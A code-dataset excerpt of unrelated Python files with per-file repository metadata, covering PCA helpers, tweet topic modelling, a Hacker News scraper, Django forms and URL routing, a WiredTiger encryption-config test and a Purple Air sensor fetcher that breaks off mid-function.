    transformed = model.fit_transform(df)
    return model, transformed
def pca_model(df):
    """Fit a full PCA (all components retained).

    args:
        df: dataframe to decompose.
    returns:
        (pca, transformed): the fitted PCA model and the transformed data.
    """
    model = PCA()
    transformed = model.fit_transform(df)
    return model, transformed
def get_min_components_variance(df, retain_variance):
    """Smallest number of principal components that retains the given variance.

    args:
        df: dataframe to decompose.
        retain_variance: target cumulative explained-variance ratio (0..1).
    returns:
        Minimum component count whose cumulative variance ratio reaches the target.
    """
    model, _ = pca_model(df)
    cumulative = np.cumsum(model.explained_variance_ratio_)
    # Indices are 0-based, so +1 converts them into component counts.
    candidate_counts = np.where(cumulative >= retain_variance)[0] + 1
    return min(candidate_counts)
def plot_curve_min_components_variance(df, mode="cumulative_variance"):
    """Plot the explained variance of a PCA fitted on ``df``.

    args:
        df: dataframe to decompose.
        mode: "cumulative_variance" to plot the cumulative explained-variance
            curve with threshold guide lines, anything else for per-component
            variance.
    returns:
        None, only plots the curve.
    """
    rcParams['figure.figsize'] = 12, 8
    pca, _ = pca_model(df)
    plt.figure()
    explained_variance = pca.explained_variance_ratio_
    cumulative_sum = np.cumsum(explained_variance)
    ind = np.arange(len(explained_variance))
    ax = plt.subplot(111)
    if mode == "cumulative_variance":
        title = "Explained Cumulative Variance per Principal Component"
        ylabel = "Cumulative Variance (%)"
        ax.plot(ind, cumulative_sum)
        # One pair of guide lines per variance threshold. This replaces seven
        # copy-pasted hlines/vlines blocks (which also reused zorders 6 and 12
        # by accident); zorder now increases monotonically per threshold.
        for zorder, threshold in enumerate((0.2, 0.4, 0.6, 0.8, 0.9, 0.95, 0.99), start=1):
            mark = get_min_components_variance(df, threshold)
            plt.hlines(y=threshold, xmin=0, xmax=mark, color='green',
                       linestyles='dashed', zorder=zorder)
            plt.vlines(x=mark, ymin=0, ymax=threshold, color='green',
                       linestyles='dashed', zorder=zorder)
    else:
        title = "Variance per Principal Component"
        ylabel = "Variance (%)"
        ax.plot(ind, explained_variance)
    ax.set_xlabel("Number of principal components")
    ax.set_ylabel(ylabel)
    plt.title(title)
def report_features(feature_names,pca,component_number):
    '''
    Definition:
        Return the weights of the original features for one principal
        component of a fitted PCA model, sorted ascending by weight.
    args:
        feature_names: sequence of feature names, aligned with the columns
            the PCA model was fit on
        pca: fitted PCA model (exposes `components_`)
        component_number: index of the component to report
    returns:
        DataFrame indexed by "feature" with a single "weight" column,
        sorted ascending by weight
    '''
    components = pca.components_
    # Map each feature name to its weight in the requested component.
    # (dict keeps the last weight if a feature name is duplicated,
    # matching the previous behavior.)
    feature_weights = dict(zip(feature_names, components[component_number]))
    sorted_weights = sorted(feature_weights.items(), key=lambda kv: kv[1])
    # Build the frame directly from the (feature, weight) pairs instead
    # of an explicit append loop.
    df = pd.DataFrame(sorted_weights, columns=["feature", "weight"])
    df.set_index("feature", inplace=True)
    return df
| 29.908497
| 101
| 0.671547
| 643
| 4,576
| 4.625194
| 0.206843
| 0.047075
| 0.094149
| 0.122394
| 0.327169
| 0.221587
| 0.079354
| 0.035642
| 0.035642
| 0.035642
| 0
| 0.030454
| 0.210664
| 4,576
| 152
| 102
| 30.105263
| 0.792913
| 0.210664
| 0
| 0.030303
| 0
| 0
| 0.102704
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075758
| false
| 0
| 0.075758
| 0
| 0.212121
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a32ec2ac9f37deceb74746f32c5ce3fa89c08ee8
| 4,446
|
py
|
Python
|
media_analyzer/core/top_news.py
|
nyancol/MediaAnalyzer
|
fe504aa63646d27dfca6ca2c5435b0877d65ab2a
|
[
"MIT"
] | null | null | null |
media_analyzer/core/top_news.py
|
nyancol/MediaAnalyzer
|
fe504aa63646d27dfca6ca2c5435b0877d65ab2a
|
[
"MIT"
] | null | null | null |
media_analyzer/core/top_news.py
|
nyancol/MediaAnalyzer
|
fe504aa63646d27dfca6ca2c5435b0877d65ab2a
|
[
"MIT"
] | null | null | null |
import datetime
import numpy as np
import json
from sklearn.decomposition import NMF, LatentDirichletAllocation, TruncatedSVD
from sklearn.feature_extraction.text import CountVectorizer
from nltk.corpus import stopwords
import spacy
from media_analyzer import database
NUM_TOPICS = 20
def load_data(begin, end, language):
    """Fetch text and tokens of all tweets in `language` created strictly
    between `begin` and `end` (exclusive on both sides).

    Returns a list of {"text": ..., "tokens": ...} dicts.
    """
    res = None
    with database.connection() as conn:
        cur = conn.cursor()
        # Bound parameters (%s) instead of f-string interpolation: the
        # driver quotes the values, preventing SQL injection.
        cur.execute("""SELECT text, tokens
                       FROM tweets
                       WHERE language = %s
                       AND %s::date < created_at
                       AND created_at < %s::date;""",
                    (language, begin, end))
        res = cur.fetchall()
    return [{"text": text, "tokens": tokens} for text, tokens in res]
def create_model(language, data):
    """Fit an NMF topic model over the given texts.

    args:
        language: language name understood by nltk's stopwords corpus
        data: iterable of document strings
    returns:
        (fitted NMF model, vectorizer vocabulary list)
    """
    stop_words = stopwords.words(language)
    # Raw string for the regex avoids the invalid '\-' escape-sequence
    # warning; the pattern keeps words of 3+ letters/hyphens.
    vectorizer = CountVectorizer(min_df=5, max_df=0.9, lowercase=True,
                                 stop_words=stop_words,
                                 token_pattern=r'[a-zA-Z\-][a-zA-Z\-]{2,}')
    data_vectorized = vectorizer.fit_transform(data)
    # Build a Non-Negative Matrix Factorization Model.  Only the fitted
    # model is needed, so fit() replaces fit_transform() whose returned
    # document-topic matrix was previously discarded.
    nmf_model = NMF(n_components=NUM_TOPICS)
    nmf_model.fit(data_vectorized)
    return nmf_model, vectorizer.get_feature_names()
def get_top_topics(language, tweets):
    """Fit a topic model on the tweets and return, for each topic, the
    vocabulary words whose topic score is >= 1, excluding noise words."""
    model, vocabulary = create_model(language, [tweet["text"] for tweet in tweets])
    noise_words = {"nhttps"}
    topics = []
    for component in model.components_:
        indices = np.argwhere(component >= 1).flatten()
        words = [vocabulary[idx] for idx in indices
                 if vocabulary[idx] not in noise_words]
        if words:
            topics.append(words)
    return topics
def get_last_date(language):
    """Return the most recent window-start date stored for `language`,
    or None if the table has no matching row."""
    res = None
    with database.connection() as conn:
        cur = conn.cursor()
        # Parameterized query instead of f-string interpolation to
        # prevent SQL injection.
        cur.execute("""SELECT MAX(begin)
                       FROM thirty_days_topics
                       WHERE language = %s;""",
                    (language,))
        res = cur.fetchone()
    return res[0] if res else None
def save_topics(begin, language, topics):
    """Persist one computed topic batch for `language` starting at `begin`.

    Topics are stored as a JSON-encoded string.
    """
    query = """INSERT INTO thirty_days_topics (begin, language, topics)
             VALUES (%(begin)s, %(language)s, %(topics)s);"""
    params = {"begin": begin, "language": language, "topics": json.dumps(topics)}
    with database.connection() as conn:
        cursor = conn.cursor()
        cursor.execute(query, params)
        conn.commit()
        cursor.close()
def get_date_fist_tweets():
    """Return the creation timestamp of the earliest stored tweet.

    NOTE(review): the name looks like a typo for get_date_first_tweets;
    kept unchanged for backward compatibility with callers.
    """
    row = None
    with database.connection() as conn:
        cursor = conn.cursor()
        cursor.execute("SELECT MIN(created_at) FROM tweets;")
        row = cursor.fetchone()
    return row[0]
def count_matches(tweets, topics, language):
    """Count, for each topic, how many tweets contain at least one of its
    (lemmatized) keywords.

    args:
        tweets: iterable of dicts with a "tokens" key
        topics: list of keyword lists (as returned by get_top_topics)
        language: language name used to pick the spaCy model
    returns:
        list of {"keywords": original keyword list, "matches": count}
    """
    def lemmatize_topics(language, topics):
        # Lemmatize keywords so they compare against tweet tokens.
        parsers = {"english": "en", "french": "fr",
                   "spanish": "es", "italian": "it"}
        parser = spacy.load(parsers[language])
        return [[parser(key)[0].lemma_ for key in keywords] for keywords in topics]

    # Convert each topic to a set ONCE; previously this happened inside
    # the per-tweet helper, i.e. once per tweet.
    topic_sets = [set(keywords) for keywords in lemmatize_topics(language, topics)]
    matches = np.zeros(len(topics), dtype=int)
    for tweet in tweets:
        for i, keywords in enumerate(topic_sets):
            # Generator (not list) inside any(): stops at the first hit.
            if any(token in keywords for token in tweet["tokens"]):
                matches[i] += 1
    return [{"keywords": topic, "matches": match}
            for topic, match in zip(topics, matches.tolist())]
def compute_language(language):
    """Slide a 30-day window, advancing one day at a time, over the tweet
    history of `language`; compute and save topics for every window."""
    start = get_last_date(language)
    if start is None:
        # No previous run recorded: begin at the project's epoch.
        start = datetime.datetime(2018, 12, 1).date()
    else:
        start += datetime.timedelta(days=1)
    one_day = datetime.timedelta(days=1)
    window = datetime.timedelta(days=30)
    while start < datetime.datetime.now().date() - window:
        stop = start + window
        print(f"Computing interval: {start} -> {stop} for {language}")
        tweets = load_data(start, stop, language)
        topics = get_top_topics(language, tweets)
        topics = count_matches(tweets, topics, language)
        save_topics(start, language, topics)
        start += one_day
def compute():
    """Recompute topic windows for every language known to the database."""
    for language in database.get_languages():
        compute_language(language)
# Script entry point: recompute topics for all configured languages.
if __name__ == "__main__":
    compute()
| 33.938931
| 97
| 0.634278
| 540
| 4,446
| 5.087037
| 0.285185
| 0.035675
| 0.032035
| 0.034947
| 0.247179
| 0.12996
| 0.112486
| 0.092829
| 0.092829
| 0.092829
| 0
| 0.007207
| 0.251012
| 4,446
| 130
| 98
| 34.2
| 0.817718
| 0.010571
| 0
| 0.147059
| 0
| 0
| 0.154196
| 0.005458
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107843
| false
| 0
| 0.078431
| 0
| 0.264706
| 0.009804
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3325c6fb73e3191f10fa77771bfdc292d1ff768
| 2,586
|
py
|
Python
|
scraper.py
|
squash-bit/Automate-Whatsapp-News
|
9bdbbbb397dc680825b19adcda4da81d1f66270c
|
[
"MIT"
] | 4
|
2020-11-21T19:08:56.000Z
|
2021-05-06T13:09:45.000Z
|
scraper.py
|
squash-bit/Agent-Wallie
|
9bdbbbb397dc680825b19adcda4da81d1f66270c
|
[
"MIT"
] | 1
|
2021-05-06T19:26:06.000Z
|
2021-05-06T19:26:06.000Z
|
scraper.py
|
squash-bit/Agent-Wallie
|
9bdbbbb397dc680825b19adcda4da81d1f66270c
|
[
"MIT"
] | 1
|
2021-05-06T13:25:08.000Z
|
2021-05-06T13:25:08.000Z
|
# import necessary modules
import os
import re
import requests
import newspaper
from bs4 import BeautifulSoup
from newspaper import Article
from newspaper import Config
from article_summarizer import summarizer
from time import sleep
# clean data
class Cleanser:
    """Scrape the Hacker News front page and collect articles whose
    keywords match any of the configured buzz words."""

    def __init__(self, buzz_words):
        # Source page to scrape.
        self.url = 'https://news.ycombinator.com/news'
        self.buzz_words = buzz_words
        # Accumulated matches: dicts with 'link', 'title', 'summary'.
        self.articles_final = []

    def gather_info(self):
        """Scrape titles/links from the front page, keep articles whose
        keywords contain a buzz word, and summarize each match.

        Returns self.articles_final (also mutated in place).
        """
        try:
            r = requests.get(self.url)
            html_soup = BeautifulSoup(r.text, 'html.parser')
            for item in html_soup.find_all('tr', class_='athing'):
                item_a = item.find('a', class_='storylink')
                item_link = item_a.get('href') if item_a else None
                item_text = item_a.get_text(strip=True) if item_a else None
                # list of words that occur most frequently in the article
                keywords = self.get_keywords(item_link)
                for buzz_word in self.buzz_words:
                    if buzz_word.lower() in keywords:
                        print(keywords)
                        # summarize contents using article_summarizer
                        summary = summarizer(item_link)
                        self.articles_final.append(
                            {'link' : item_link,
                             'title' : item_text,
                             'summary': summary})
                        # BUG FIX: stop after the first matching buzz word,
                        # otherwise an article matching several buzz words
                        # was summarized and appended once per match.
                        break
        except requests.exceptions.SSLError:
            print("Max retries exceeded, Try again later...")
        return self.articles_final

    # get a list of words that occur most frequent in an article
    def get_keywords(self, url):
        """Return the article's most frequent keywords, or [] on failure."""
        user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
        config = Config()
        config.browser_user_agent = user_agent
        paper = Article(url, config=config)
        try:
            paper.download()
            paper.parse()
            paper.nlp()
        except Exception:
            # Narrowed from a bare except: download/parse/nlp failures still
            # yield [], but KeyboardInterrupt/SystemExit now propagate.
            return []
        return paper.keywords
| 39.181818
| 144
| 0.593968
| 311
| 2,586
| 4.803859
| 0.421222
| 0.03012
| 0.026104
| 0.03079
| 0.105756
| 0.085676
| 0.045515
| 0.045515
| 0
| 0
| 0
| 0.01611
| 0.32792
| 2,586
| 65
| 145
| 39.784615
| 0.843498
| 0.221191
| 0
| 0.043478
| 0
| 0.021739
| 0.121561
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065217
| false
| 0
| 0.195652
| 0
| 0.347826
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3340d73b31131cbb0f369140b3afe55408788f6
| 1,351
|
py
|
Python
|
soli/aria/forms/species.py
|
rcdixon/soli
|
d29c77c1d391dfcc3c0dd0297ecf93fa9aa046ab
|
[
"MIT"
] | null | null | null |
soli/aria/forms/species.py
|
rcdixon/soli
|
d29c77c1d391dfcc3c0dd0297ecf93fa9aa046ab
|
[
"MIT"
] | null | null | null |
soli/aria/forms/species.py
|
rcdixon/soli
|
d29c77c1d391dfcc3c0dd0297ecf93fa9aa046ab
|
[
"MIT"
] | null | null | null |
from aria.models import Genus, Species, Subspecies
from django import forms
from django.forms import inlineformset_factory
from .templates.templates import createTextInput, createSelectInput
class CreateSpeciesForm(forms.ModelForm):
    """ModelForm for creating a Species with its genus.

    The genus field is added in __init__ (not declared in Meta) so its
    queryset is built per-form instantiation, ordered by name.
    """
    class Meta:
        model = Species
        fields = ["name", "common_name"]
        widgets = {
            "name": createTextInput("Species"),
            "common_name": createTextInput("Common Name")
        }

    def __init__(self, *args, **kwargs):
        super(CreateSpeciesForm, self).__init__(*args, **kwargs)
        # Genus dropdown: all genera alphabetically, rendered italic.
        self.fields["genus"] = forms.ModelChoiceField(
            queryset=Genus.objects.all().order_by("name"),
            widget=createSelectInput("Genus", ["font-italic"]))
        self.fields["genus"].empty_label = "Genus"

    def saveSpecies(self, request):
        """Save the form's species, linking the genus chosen in the POST.

        The genus key comes straight from request.POST["genus"]
        (presumably a ge_num primary key -- confirm against the view).
        """
        species = self.save(commit=False)
        species.sp_ge_num = Genus(ge_num=request.POST["genus"])
        species.save()
def subspeciesFormSet(species=None):
    """Build an inline formset for a species' subspecies names.

    args:
        species: the Species instance to bind; when omitted a fresh
            unsaved Species is created per call.
    returns:
        a single blank form when the formset has exactly one form,
        otherwise the whole formset.

    BUG FIX: the old default `species=Species()` was evaluated once at
    import time, so every default call shared the same Species instance.
    Using None as the sentinel gives each call its own instance; callers
    passing an explicit species are unaffected.
    """
    if species is None:
        species = Species()
    formset = inlineformset_factory(
        Species,
        Subspecies,
        fields=["name"],
        extra=1,
        can_delete=False,
        widgets={
            "name": createTextInput("Subspecies")
        })
    subspecies = formset(instance=species)
    # With no existing subspecies, extra=1 yields exactly one blank form;
    # return it directly rather than a one-element formset.
    if len(subspecies) == 1:
        subspecies = subspecies[0]
    return subspecies
| 29.369565
| 67
| 0.634345
| 132
| 1,351
| 6.356061
| 0.454545
| 0.035757
| 0.061979
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002944
| 0.245744
| 1,351
| 45
| 68
| 30.022222
| 0.820412
| 0
| 0
| 0.055556
| 0
| 0
| 0.07846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.111111
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3349b6abd791f21baf0e781406ef6802460401f
| 285
|
py
|
Python
|
hour.py
|
anokata/pythonPetProjects
|
245c3ff11ae560b17830970061d8d60013948fd7
|
[
"MIT"
] | 3
|
2017-04-30T17:44:53.000Z
|
2018-02-03T06:02:11.000Z
|
hour.py
|
anokata/pythonPetProjects
|
245c3ff11ae560b17830970061d8d60013948fd7
|
[
"MIT"
] | 10
|
2021-03-18T20:17:19.000Z
|
2022-03-11T23:14:19.000Z
|
hour.py
|
anokata/pythonPetProjects
|
245c3ff11ae560b17830970061d8d60013948fd7
|
[
"MIT"
] | null | null | null |
import math
def angle(m):
    """Return the relative angle (degrees) between the clock hands.

    The hands separate at 5.5 degrees per minute; the division by 60
    suggests m is measured in seconds (the main loop below iterates
    over 1440*60 seconds of a day) -- confirm the intended unit.
    """
    return 5.5 * m / 60
print(angle(20))
# Scan every second of a 24-hour day (1440 minutes * 60 seconds) and
# print the moments where angle(m) is nearly an exact multiple of 360
# degrees (fractional part of a below 1e-5), counting them in i.
i = 0
for m in range(0,1440*60):
    a = angle(m) / 360
    # d is the fractional part of a; near zero means a whole number of turns.
    d = a - math.floor(a)
    if (d < 0.00001):
        print(a, math.floor(a), d, d == 0.0)
        i += 1
print(i)
# Print 360*m/5.5 for m = 0..24 -- presumably the times (in minutes) at
# which the hands coincide; confirm intent.
for m in range(25):
    print(360*m/5.5)
| 14.25
| 44
| 0.508772
| 58
| 285
| 2.5
| 0.413793
| 0.082759
| 0.082759
| 0.151724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.165829
| 0.301754
| 285
| 19
| 45
| 15
| 0.562814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.071429
| 0.071429
| 0.214286
| 0.285714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a33556dfd1ea6c5a377213bf148dae18a67adec5
| 4,038
|
py
|
Python
|
src/third_party/wiredtiger/test/suite/test_encrypt08.py
|
benety/mongo
|
203430ac9559f82ca01e3cbb3b0e09149fec0835
|
[
"Apache-2.0"
] | null | null | null |
src/third_party/wiredtiger/test/suite/test_encrypt08.py
|
benety/mongo
|
203430ac9559f82ca01e3cbb3b0e09149fec0835
|
[
"Apache-2.0"
] | null | null | null |
src/third_party/wiredtiger/test/suite/test_encrypt08.py
|
benety/mongo
|
203430ac9559f82ca01e3cbb3b0e09149fec0835
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Public Domain 2014-present MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# test_encrypt08.py
# Test some error conditions with the libsodium encryption extension.
#
import wiredtiger, wttest
from wtscenario import make_scenarios
#
# Test sodium encryption configuration.
# This exercises the error paths in the encryptor's customize method when
# used for system (not per-table) encryption.
#
class test_encrypt08(wttest.WiredTigerTestCase):
    """Exercise error paths in the sodium encryptor's customize method
    when used for system-wide (not per-table) encryption: each scenario
    reopens the connection with a bad config and expects a specific
    error message."""
    uri = 'file:test_encrypt08'

    # To test the sodium encryptor, we use secretkey= rather than
    # setting a keyid, because for a "real" (vs. test-only) encryptor,
    # keyids require some kind of key server, and (a) setting one up
    # for testing would be a nuisance and (b) currently the sodium
    # encryptor doesn't support any anyway.
    #
    # It expects secretkey= to provide a hex-encoded 256-bit chacha20 key.
    # This key will serve for testing purposes.
    sodium_testkey = '0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef'

    # One scenario per invalid config: the sys_encrypt fragment and the
    # error-message pattern the reopen is expected to raise.
    encrypt_type = [
        ('nokey', dict( sys_encrypt='',
            msg='/no key given/')),
        ('keyid', dict( sys_encrypt='keyid=123',
            msg='/keyids not supported/')),
        ('twokeys', dict( sys_encrypt='keyid=123,secretkey=' + sodium_testkey,
            msg='/keys specified with both/')),
        ('nothex', dict( sys_encrypt='secretkey=plop',
            msg='/secret key not hex/')),
        ('badsize', dict( sys_encrypt='secretkey=0123456789abcdef',
            msg='/wrong secret key length/')),
    ]
    scenarios = make_scenarios(encrypt_type)

    def conn_extensions(self, extlist):
        # Load the sodium encryptor extension; skip the test if not built.
        extlist.skip_if_missing = True
        extlist.extension('encryptors', 'sodium')

    # Do not use conn_config to set the encryption, because that sets
    # the encryption during open when we don't have control and can't
    # catch exceptions. Instead we'll let the framework open without
    # encryption and then reopen ourselves. This seems to behave as
    # desired (we get the intended errors from inside the encryptor)
    # even though one might expect it to fail because it's reopening
    # the database with different encryption. (If in the future it starts
    # doing that, the workaround is to override setUpConnectionOpen.
    # I'm not doing that now because it's quite a bit messier.)

    # (Re)open the database with bad encryption config.
    def test_encrypt(self):
        # Expect reopen to raise WiredTigerError matching the scenario's msg.
        sysconfig = 'encryption=(name=sodium,{0}),'.format(self.sys_encrypt)
        self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
            lambda:
            self.reopen_conn(config = sysconfig),
            self.msg)
# Allow running this test file directly through the wttest harness.
if __name__ == '__main__':
    wttest.run()
| 43.419355
| 87
| 0.698613
| 543
| 4,038
| 5.141805
| 0.488029
| 0.02149
| 0.025072
| 0.01361
| 0.015759
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025584
| 0.225607
| 4,038
| 92
| 88
| 43.891304
| 0.867285
| 0.620109
| 0
| 0
| 0
| 0
| 0.231081
| 0.080405
| 0
| 0
| 0
| 0
| 0.034483
| 1
| 0.068966
| false
| 0
| 0.068966
| 0
| 0.310345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a336bdbfb6767de53ac20167cacab792872e5ecf
| 1,779
|
py
|
Python
|
{{cookiecutter.github_repository_name}}/{{cookiecutter.app_name}}/urls.py
|
mabdullahabid/cookiecutter-django-rest
|
8cab90f115b99f7b700ec38a08cb3647eb0a847b
|
[
"MIT"
] | null | null | null |
{{cookiecutter.github_repository_name}}/{{cookiecutter.app_name}}/urls.py
|
mabdullahabid/cookiecutter-django-rest
|
8cab90f115b99f7b700ec38a08cb3647eb0a847b
|
[
"MIT"
] | null | null | null |
{{cookiecutter.github_repository_name}}/{{cookiecutter.app_name}}/urls.py
|
mabdullahabid/cookiecutter-django-rest
|
8cab90f115b99f7b700ec38a08cb3647eb0a847b
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, re_path, include, reverse_lazy
from django.views.generic.base import RedirectView
from rest_framework import permissions
from rest_framework.authtoken import views
from rest_framework.routers import DefaultRouter
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
from .users.views import UserViewSet, UserCreateViewSet
router = DefaultRouter()
# NOTE(review): both viewsets register under the same "users" prefix;
# confirm that DRF's route generation does not collide for these two.
router.register(r"users", UserViewSet)
router.register(r"users", UserCreateViewSet)

urlpatterns = [
    path("admin/", admin.site.urls),
    # All router-generated API endpoints live under /api/v1/.
    path("api/v1/", include(router.urls)),
    # Token authentication: POST credentials, receive an auth token.
    path("api-token-auth/", views.obtain_auth_token),
    path("api-auth/", include("rest_framework.urls", namespace="rest_framework")),
    # the 'api-root' from django rest-frameworks default router
    # http://www.django-rest-framework.org/api-guide/routers/#defaultrouter
    re_path(r"^$", RedirectView.as_view(url=reverse_lazy("api-root"), permanent=False)),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)

# Admin-site branding (the {{ cookiecutter.* }} placeholders are filled
# in when the project template is generated).
admin.site.site_header = "{{ cookiecutter.app_title }}"
admin.site.site_title = "{{ cookiecutter.app_title }} Admin Portal"
admin.site.index_title = "{{ cookiecutter.app_title }} Admin"

# Swagger
api_info = openapi.Info(
    title="{{ cookiecutter.app_title }} API",
    default_version="v1",
    description="API Documentation for {{ cookiecutter.app_title }}",
    contact=openapi.Contact(email="{{ cookiecutter.email }}"),
)

schema_view = get_schema_view(
    api_info,
    public=True,
    # API docs are restricted to authenticated users.
    permission_classes=(permissions.IsAuthenticated,),
)

urlpatterns += [
    path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
| 35.58
| 88
| 0.754918
| 231
| 1,779
| 5.649351
| 0.363636
| 0.045977
| 0.076628
| 0.057471
| 0.045977
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001906
| 0.115233
| 1,779
| 50
| 89
| 35.58
| 0.827192
| 0.075323
| 0
| 0
| 0
| 0
| 0.19805
| 0.067032
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.289474
| 0
| 0.289474
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a33868010eb5e7ae344ef9b1e3fe0336947b0c2f
| 4,260
|
py
|
Python
|
pdk_api.py
|
audacious-software/Passive-Data-Kit-External-Sensors
|
c4781c04ce3cb485b0c1e50a9e7c6db0c92a9959
|
[
"Apache-2.0"
] | null | null | null |
pdk_api.py
|
audacious-software/Passive-Data-Kit-External-Sensors
|
c4781c04ce3cb485b0c1e50a9e7c6db0c92a9959
|
[
"Apache-2.0"
] | null | null | null |
pdk_api.py
|
audacious-software/Passive-Data-Kit-External-Sensors
|
c4781c04ce3cb485b0c1e50a9e7c6db0c92a9959
|
[
"Apache-2.0"
] | null | null | null |
# pylint: disable=line-too-long, no-member
from __future__ import print_function
import arrow
import requests
from django.conf import settings
from django.contrib.gis.geos import GEOSGeometry
from django.utils import timezone
from django.utils.text import slugify
from passive_data_kit_external_sensors.models import SensorRegion, Sensor, SensorLocation, SensorDataPayload, SensorModel
def fetch_sensors():
    """Fetch sensor records from the configured Purple Air endpoint.

    Sensors located inside the union of all SensorRegion bounds flagged
    include_sensors=True are annotated in place with 'pdk_identifier'
    and 'pdk_observed' and collected into region_matches.

    NOTE(review): the function returns the full, UNFILTERED `sensors`
    list rather than `region_matches` -- confirm which one callers
    actually expect; the filtering work is otherwise only visible in
    the printed counts.
    """
    sensors = []
    if hasattr(settings, 'PDK_EXTERNAL_SENSORS_PURPLE_AIR_URL'): # pylint: disable=too-many-nested-blocks
        valid_region = None
        # Union the bounds of every region that should include sensors.
        # NOTE(review): if no region is flagged include_sensors, valid_region
        # stays None and valid_region.contains(...) below raises
        # AttributeError -- confirm whether that case can occur.
        for region in SensorRegion.objects.filter(include_sensors=True):
            if valid_region is None:
                valid_region = region.bounds
            else:
                valid_region = valid_region.union(region.bounds)
        response = requests.get(settings.PDK_EXTERNAL_SENSORS_PURPLE_AIR_URL)
        if response.status_code == 200:
            sensors = response.json()['results']
            region_matches = []
            for sensor in sensors:
                if 'Lat' in sensor and 'Lon' in sensor:
                    # GEOS points are POINT(x y) = POINT(lon lat).
                    sensor_location = GEOSGeometry('POINT(%f %f)' % (sensor['Lon'], sensor['Lat'],))
                    if valid_region.contains(sensor_location):
                        if 'ID' in sensor:
                            sensor['pdk_identifier'] = 'purpleair-' + str(sensor['ID'])
                        if 'LastSeen' in sensor:
                            # 'LastSeen' is parsed by arrow (presumably an
                            # epoch timestamp -- confirm upstream format).
                            sensor['pdk_observed'] = arrow.get(sensor['LastSeen']).datetime
                        region_matches.append(sensor)
                # else:
                #    print('INCOMPLETE? ' + json.dumps(sensor, indent=2))
            print('START: ' + str(len(sensors)) + ' - IMPORT: ' + str(len(region_matches)))
        else:
